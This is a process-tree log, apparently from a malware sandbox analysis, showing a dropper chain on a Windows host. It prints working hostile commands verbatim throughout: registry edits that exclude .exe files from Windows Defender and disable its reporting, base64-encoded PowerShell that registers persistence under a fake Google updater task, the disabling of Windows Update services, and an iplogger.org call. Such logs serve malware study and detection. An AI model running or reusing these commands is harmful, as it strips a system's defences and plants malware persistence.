"C:\Users\Admin\Pictures\Adobe Films\HB7WwFP_QCu3QwzuG59xAp0U.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2348

C:\Users\Admin\AppData\Local\Temp\7zS5033.tmp\Install.exe
.\Install.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3708

C:\Users\Admin\AppData\Local\Temp\7zS5AD2.tmp\Install.exe
.\Install.exe /S /site_id "525403"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Enumerates system info in registry
PID:1988

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
7⤵
PID:488

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
8⤵
PID:3920

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
9⤵
PID:4028

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
9⤵
PID:3628

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
7⤵
PID:1164

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
8⤵
PID:3028

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
9⤵
PID:4120

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
9⤵
- Loads dropped DLL
PID:4596

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gsvzjJiiO" /SC once /ST 00:16:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
7⤵
- Creates scheduled task(s)
PID:2256

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gsvzjJiiO"
7⤵
PID:1780

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gsvzjJiiO"
7⤵
PID:2240

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bcyLPxSbowNIYSAEXo" /SC once /ST 18:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\rEOjcbxbCuqHvfnAw\sCpvQSojPTfRfLZ\UzrKuwT.exe\" Qa /site_id 525403 /S" /V1 /F
7⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4120

C:\Users\Admin\Pictures\Adobe Films\6vET8y_A8bX42BlhY8UaUxMU.exe
"C:\Users\Admin\Pictures\Adobe Films\6vET8y_A8bX42BlhY8UaUxMU.exe"
4⤵
- Executes dropped EXE
PID:1012

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1012 -s 348
5⤵
- Program crash
PID:4048

C:\Users\Admin\Pictures\Adobe Films\tjoZYFEsViS0L_WZpyXQAzmU.exe
"C:\Users\Admin\Pictures\Adobe Films\tjoZYFEsViS0L_WZpyXQAzmU.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1600

C:\Users\Admin\Pictures\Adobe Films\n1qMhVvLc1ozD0wTDraEdadw.exe
"C:\Users\Admin\Pictures\Adobe Films\n1qMhVvLc1ozD0wTDraEdadw.exe"
4⤵
PID:1140

C:\Users\Admin\Pictures\Adobe Films\n1qMhVvLc1ozD0wTDraEdadw.exe
"C:\Users\Admin\Pictures\Adobe Films\n1qMhVvLc1ozD0wTDraEdadw.exe" help
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3180

C:\Users\Admin\Pictures\Adobe Films\oE3SzOZclk1Z_QOY7l6mFPQU.exe
"C:\Users\Admin\Pictures\Adobe Films\oE3SzOZclk1Z_QOY7l6mFPQU.exe"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2984

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe"
5⤵
- Executes dropped EXE
PID:328

C:\Users\Admin\AppData\Local\Temp\4HFIB.exe
"C:\Users\Admin\AppData\Local\Temp\4HFIB.exe"
6⤵
- Executes dropped EXE
PID:3916

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\4HFIB.exe"
7⤵
PID:1572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAcABzAGEAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBvAGgAdgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBxAHYAcABtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAagBvAG8AIwA+AA=="
8⤵
PID:1500

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
9⤵
- Executes dropped EXE
PID:4988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
8⤵
PID:4352

C:\Windows\system32\sc.exe
sc stop UsoSvc
9⤵
- Launches sc.exe
PID:2580

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
9⤵
- Launches sc.exe
PID:4240

C:\Windows\system32\sc.exe
sc stop wuauserv
9⤵
- Launches sc.exe
PID:3956

C:\Windows\system32\sc.exe
sc stop bits
9⤵
- Launches sc.exe
PID:1036

C:\Windows\system32\sc.exe
sc stop dosvc
9⤵
- Launches sc.exe
PID:3124

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
9⤵
- Modifies registry key
PID:272

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
9⤵
- Modifies registry key
PID:3960

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
9⤵
- Modifies security service
- Modifies registry key
PID:784

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
9⤵
- Modifies registry key
PID:1140

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
9⤵
- Modifies registry key
PID:3552

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
9⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1340

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
9⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5032

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
9⤵
- Modifies registry key
PID:4428

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
9⤵
- Modifies registry key
PID:5112

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
9⤵
- Modifies registry key
PID:648

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
9⤵
- Modifies registry key
PID:3468

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
9⤵
PID:564

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
9⤵
PID:4748

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
9⤵
PID:1476

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
9⤵
PID:3308

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
9⤵
PID:3696

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
9⤵
PID:208

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
9⤵
PID:4856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAbQBjAGUAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEARwBZAEEAZQBRAEEAagBBAEQANABBAEkAQQBCAFQAQQBIAFEAQQBZAFEAQgB5AEEASABRAEEATABRAEIAUQBBAEgASQBBAGIAdwBCAGoAQQBHAFUAQQBjAHcAQgB6AEEAQwBBAEEATABRAEIARwBBAEcAawBBAGIAQQBCAGwAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAEkAQQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBjAEEARQBNAEEAYQBBAEIAeQBBAEcAOABBAGIAUQBCAGwAQQBGAHcAQQBkAFEAQgB3AEEARwBRAEEAWQBRAEIAMABBAEcAVQBBAGMAZwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAdABBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBJAEEAQgBTAEEASABVAEEAYgBnAEIAQgBBAEgATQBBAEkAQQBBADgAQQBDAE0AQQBaAHcAQgBvAEEASABnAEEAZQBnAEEAagBBAEQANABBACIAJwApACAAPAAjAHgAeQBvACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAYgBnAGUAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBqAGMAdAAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAG8AdQBpACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwANABIAEYASQBCAC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwB3AGwAZQAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnADsA"
8⤵
- Drops file in Program Files directory
PID:2324

C:\Users\Admin\AppData\Local\Temp\HIJB7.exe
"C:\Users\Admin\AppData\Local\Temp\HIJB7.exe"
6⤵
- Executes dropped EXE
PID:3136

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\HIJB7.exe"
7⤵
- Executes dropped EXE
PID:2908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAcgBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG8AYwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGEAaQBtACMAPgA="
8⤵
PID:2676

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1140

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
8⤵
PID:2548

C:\Windows\system32\sc.exe
sc stop UsoSvc
9⤵
- Launches sc.exe
PID:2996

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
9⤵
- Launches sc.exe
PID:988

C:\Windows\system32\sc.exe
sc stop wuauserv
9⤵
- Launches sc.exe
PID:3468

C:\Windows\system32\sc.exe
sc stop bits
9⤵
- Launches sc.exe
PID:2168

C:\Windows\system32\sc.exe
sc stop dosvc
9⤵
- Launches sc.exe
PID:4736

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
9⤵
- Modifies registry key
PID:848

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
9⤵
- Modifies registry key
PID:216

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
9⤵
- Modifies registry key
PID:636

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
9⤵
- Modifies registry key
PID:2304

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
9⤵
- Modifies registry key
PID:2904

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
9⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:776

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
9⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4308

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
9⤵
- Modifies registry key
PID:1948

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
9⤵
- Modifies registry key
PID:1096

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
9⤵
- Modifies registry key
PID:3660

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
9⤵
- Modifies registry key
PID:2944

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
9⤵
PID:1400

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
9⤵
PID:932

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
9⤵
PID:4336

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
9⤵
PID:948

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
9⤵
PID:3152

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
9⤵
PID:932

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
9⤵
PID:1916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAagB3ACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACIAJwApACAAPAAjAHkAdgB5AGcAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AEwAbwBnAE8AbgApACAAPAAjAGMAdwAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGEAYQAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnACAAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAegBrAGsAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABIAEkASgBCADcALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAZABpAG8AaQAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAZQBwACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="
8⤵
PID:960

C:\Users\Admin\AppData\Local\Temp\0F7DJ.exe
"C:\Users\Admin\AppData\Local\Temp\0F7DJ.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:3416

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /y .\BRXlVN.Zd
7⤵
- Loads dropped DLL
PID:4392

C:\Users\Admin\AppData\Local\Temp\D399M1F691226D6.exe
https://iplogger.org/1OAvJ
6⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 328 -s 704
6⤵
- Program crash
PID:1632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 328 -s 736
6⤵
- Program crash
PID:1488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 328 -s 892
6⤵
- Program crash
PID:2500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 328 -s 896
6⤵
- Program crash
PID:4284

C:\Users\Admin\AppData\Local\Temp\D9D20IFKDJGI77J.exe
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>509 Bandwidth Limit Exceeded</TITLE> </HEAD><BODY> <H1>Bandwidth Limit Exceeded</H1> The server is temporarily unable to service your request due to the site owner reaching his/her bandwidth limit. Please try again later. </BODY></HTML>
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2496

C:\Users\Admin\AppData\Local\Temp\24KL478JE5HF575.exe
6⤵
PID:4284

C:\Users\Admin\AppData\Local\Temp\liyong.exe
"C:\Users\Admin\AppData\Local\Temp\liyong.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:3632

